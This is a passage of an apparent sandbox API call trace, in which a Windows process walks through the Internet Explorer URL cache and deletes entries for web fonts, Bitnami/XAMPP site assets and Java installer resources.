(lpszUrlName="https://fonts.gstatic.com/s/roboto/v15/RxZJdnzeo3R5zSexge8UUfY6323mHUZFJMgTvxaG2iE.eot") returned 1 [0039.889] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.889] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.889] DeleteUrlCacheEntryW (lpszUrlName="https://d33np9n32j53g7.cloudfront.net/assets/ie-1b067d2a3ec9d72b71693aa05193a525.js") returned 1 [0039.890] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.891] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.891] DeleteUrlCacheEntryW (lpszUrlName="https://d33np9n32j53g7.cloudfront.net/assets/stacks/tiki/img/tiki-stack-110x117-185383214993efbdbb275b3b3a36c318.png") returned 1 [0039.892] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.892] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.892] DeleteUrlCacheEntryW (lpszUrlName="https://fonts.typekit.net/af/6324fc/000000000000000000017823/27/i?subset_id=2&fvd=n4") returned 1 [0039.893] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.894] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.894] DeleteUrlCacheEntryW (lpszUrlName="https://d33np9n32j53g7.cloudfront.net/assets/stacks/simpleinvoices/img/simpleinvoices-stack-110x117-62035eb5e389c67479757b4ebf055485.png") returned 1 [0039.895] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.895] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.895] DeleteUrlCacheEntryW (lpszUrlName="https://d33np9n32j53g7.cloudfront.net/assets/new/social-icons-b061590b8fdab8c2c6f65124578e2f0d.png") returned 1 [0039.896] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.896] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.896] DeleteUrlCacheEntryW (lpszUrlName="https://bitnami.com/stack/xampp?utm_source=bitnami&utm_medium=installer&utm_campaign=XAMPP%2BInstaller") returned 1 [0039.897] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.897] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.897] DeleteUrlCacheEntryW (lpszUrlName="res://C:%5CUsers%5CDSSDPM~1%5CAppData%5CLocal%5CTemp%5Cjds270646.tmp%5Cjre-8u92-windows-i586.exe/progress_bg_fill.png") returned 1 [0039.899] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.899] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.899] DeleteUrlCacheEntryW (lpszUrlName="res://C:%5CUsers%5CDSSDPM~1%5CAppData%5CLocal%5CTemp%5Cjds270646.tmp%5Cjre-8u92-windows-i586.exe/common.css") returned 1 [0039.900] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.900] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.900] DeleteUrlCacheEntryW (lpszUrlName="https://s.ytimg.com/yts/cssbin/www-embed-player-vflc-oGPf.css") returned 1 [0039.900] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.901] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.901] DeleteUrlCacheEntryW (lpszUrlName="res://C:%5CUsers%5CDSSDPM~1%5CAppData%5CLocal%5CTemp%5Cjds270646.tmp%5Cjre-8u92-windows-i586.exe/host.js") returned 1 [0039.901] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.901] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.901] DeleteUrlCacheEntryW (lpszUrlName="https://d33np9n32j53g7.cloudfront.net/assets/stacks/mybb/img/mybb-stack-110x117-19bc434d7abb1957fa0c6afb193f3c3e.png") returned 1 [0039.902] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.902] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.902] DeleteUrlCacheEntryW (lpszUrlName="https://fonts.typekit.net/af/275e5f/000000000000000000017827/27/i?fvd=n6") returned 1 [0039.903] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.903] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.903] DeleteUrlCacheEntryW (lpszUrlName="https://www.google.com/js/bg/iGPPK2Fw_FTg1zqiB-fxPpL-qg2R8A3lcjJzScr9JMc.js") returned 1 [0039.905] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.905] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x71b42e0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x71b42e0, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.905] DeleteUrlCacheEntryW (lpszUrlName="res://C:\\Windows\\system32\\mmcndmgr.dll/views.js") returned 1 [0039.906] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.906] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.906] DeleteUrlCacheEntryW (lpszUrlName="https://d33np9n32j53g7.cloudfront.net/assets/os-icons2.eot?") returned 1 [0039.908] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.908] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.908] DeleteUrlCacheEntryW (lpszUrlName="https://d33np9n32j53g7.cloudfront.net/assets/application-3c1e99059b4c9ed26b807b85b2cc4e7b.css") returned 1 [0039.910] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.910] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.910] DeleteUrlCacheEntryW (lpszUrlName="res://C:%5CUsers%5CDSSDPM~1%5CAppData%5CLocal%5CTemp%5Cjds270646.tmp%5Cjre-8u92-windows-i586.exe/layout.js") returned 1 [0039.911] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.911] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.911] DeleteUrlCacheEntryW (lpszUrlName="https://d33np9n32j53g7.cloudfront.net/assets/new/logo-8775428002414243bc8e4040a826cab7.png") returned 1 [0039.913] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.913] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.913] DeleteUrlCacheEntryW (lpszUrlName="https://d33np9n32j53g7.cloudfront.net/assets/stacks/mahara/img/mahara-stack-110x117-aa520d5d9f8e291670815a3accfc7632.png") returned 1 [0039.914] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.914] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.915] DeleteUrlCacheEntryW (lpszUrlName="https://d33np9n32j53g7.cloudfront.net/assets/stacks/opencart/img/opencart-stack-110x117-9ae3ae01a5689c79ebb37a253f512cf9.png") returned 1 [0039.915] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.915] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.915] DeleteUrlCacheEntryW (lpszUrlName="https://fonts.gstatic.com/s/roboto/v15/OiNnAEwKzzJkQCr4qZmeq_esZW2xOQ-xsNqO47m55DA.eot") returned 1 [0039.917] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.917] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.917] DeleteUrlCacheEntryW (lpszUrlName="res://C:%5CUsers%5CDSSDPM~1%5CAppData%5CLocal%5CTemp%5Cjds270646.tmp%5Cjre-8u92-windows-i586.exe/progress_fg_left.png") returned 1 [0039.918] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.918] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.918] DeleteUrlCacheEntryW (lpszUrlName="res://C:%5CUsers%5CDSSDPM~1%5CAppData%5CLocal%5CTemp%5Cjds270646.tmp%5Cjre-8u92-windows-i586.exe/progress_en.wxl") returned 1 [0039.919] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.919] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.919] DeleteUrlCacheEntryW (lpszUrlName="https://d33np9n32j53g7.cloudfront.net/assets/stacks/orangehrm/img/orangehrm-stack-110x117-78d471f3afc359f3852c9bc50539cea6.png") returned 1 [0039.920] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.920] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.920] DeleteUrlCacheEntryW (lpszUrlName="https://d33np9n32j53g7.cloudfront.net/assets/new/cloud-select-sprite-2c96416929f81ebf515140c1aadf42de.png") returned 1 [0039.921] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.921] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.921] DeleteUrlCacheEntryW (lpszUrlName="res://C:%5CUsers%5CDSSDPM~1%5CAppData%5CLocal%5CTemp%5Cjds270646.tmp%5Cjre-8u92-windows-i586.exe/welcome.html") returned 1 [0039.922] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.922] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.922] DeleteUrlCacheEntryW (lpszUrlName="res://C:%5CUsers%5CDSSDPM~1%5CAppData%5CLocal%5CTemp%5Cjds270646.tmp%5Cjre-8u92-windows-i586.exe/progress_fg_fill.png") returned 1 [0039.922] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.923] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.923] DeleteUrlCacheEntryW (lpszUrlName="https://d33np9n32j53g7.cloudfront.net/assets/new/xampp-video-thumb-41defd615911cbd39704de831b908ff1.png") returned 1 [0039.923] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.923] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.924] DeleteUrlCacheEntryW (lpszUrlName="https://d33np9n32j53g7.cloudfront.net/assets/stacks/zurmo/img/zurmo-stack-110x117-d75b0efcc8988503128e1b826a071268.png") returned 1 [0039.925] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.925] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.925] DeleteUrlCacheEntryW (lpszUrlName="res://C:%5CUsers%5CDSSDPM~1%5CAppData%5CLocal%5CTemp%5Cjds270646.tmp%5Cjre-8u92-windows-i586.exe/l10n.js") returned 1 [0039.926] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.926] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.926] DeleteUrlCacheEntryW (lpszUrlName="res://C:%5CUsers%5CDSSDPM~1%5CAppData%5CLocal%5CTemp%5Cjds270646.tmp%5Cjre-8u92-windows-i586.exe/progress_fg_right.png") returned 1 [0039.927] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.927] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.927] DeleteUrlCacheEntryW (lpszUrlName="https://d33np9n32j53g7.cloudfront.net/assets/application_split3-828e05c7ca142464bb08d1012a78acfe.css") returned 1 [0039.928] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.928] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.928] DeleteUrlCacheEntryW (lpszUrlName="res://C:%5CUsers%5CDSSDPM~1%5CAppData%5CLocal%5CTemp%5Cjds270646.tmp%5Cjre-8u92-windows-i586.exe/progress_bg_right.png") returned 1 [0039.928] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.928] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.929] DeleteUrlCacheEntryW (lpszUrlName="res://C:%5CUsers%5CDSSDPM~1%5CAppData%5CLocal%5CTemp%5Cjds270646.tmp%5Cjre-8u92-windows-i586.exe/complete.html") returned 1 [0039.929] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.929] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.929] DeleteUrlCacheEntryW (lpszUrlName="https://static.doubleclick.net/instream/ad_status.js") returned 1 [0039.930] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.930] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.930] DeleteUrlCacheEntryW (lpszUrlName="https://d33np9n32j53g7.cloudfront.net/assets/stacks/phpbb/img/phpbb-stack-110x117-c5c8752aa11d4c6fa4fc9bf5057e8f42.png") returned 1 [0039.931] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.931] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.931] DeleteUrlCacheEntryW (lpszUrlName="https://d33np9n32j53g7.cloudfront.net/assets/stacks/dokuwiki/img/dokuwiki-stack-110x117-f736412b8bec4a8c501536749fe5b749.png") returned 1 [0039.932] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.933] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.933] DeleteUrlCacheEntryW (lpszUrlName="https://d33np9n32j53g7.cloudfront.net/assets/stacks/abantecart/img/abantecart-stack-110x117-dec4c64e9ee1ba0dcdd6983abd8347b9.png") returned 1 [0039.933] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.933] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.934] DeleteUrlCacheEntryW (lpszUrlName="https://fonts.gstatic.com/s/roboto/v15/OLffGBTaF0XFOW1gnuHF0WfQcKutQXcIrRfyR5jdjY8.eot") returned 1 [0039.934] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.934] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.935] DeleteUrlCacheEntryW (lpszUrlName="https://d33np9n32j53g7.cloudfront.net/assets/stacks/owncloud/img/owncloud-stack-110x117-896ef56d7c692a2e3f6a90edd4d1bbb7.png") returned 1 [0039.935] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.935] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.935] DeleteUrlCacheEntryW (lpszUrlName="res://C:%5CUsers%5CDSSDPM~1%5CAppData%5CLocal%5CTemp%5Cjds270646.tmp%5Cjre-8u92-windows-i586.exe/complete_en.wxl") returned 1 [0039.936] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.936] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.936] DeleteUrlCacheEntryW (lpszUrlName="https://d33np9n32j53g7.cloudfront.net/assets/fonts/os-icons-8d5452e6451c97113a141dd22504dee9.css") returned 1 [0039.937] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.937] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x7169060, lpcbCacheEntryInfo=0x68ff634) returned 1 [0039.937] DeleteUrlCacheEntryW (lpszUrlName="https://fonts.gstatic.com/s/roboto/v15/5YB-ifwqHP20Yn46l_BDhA.eot") returned 1 [0039.938] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634 | out: lpNextCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x68ff634) returned 0 [0039.938] 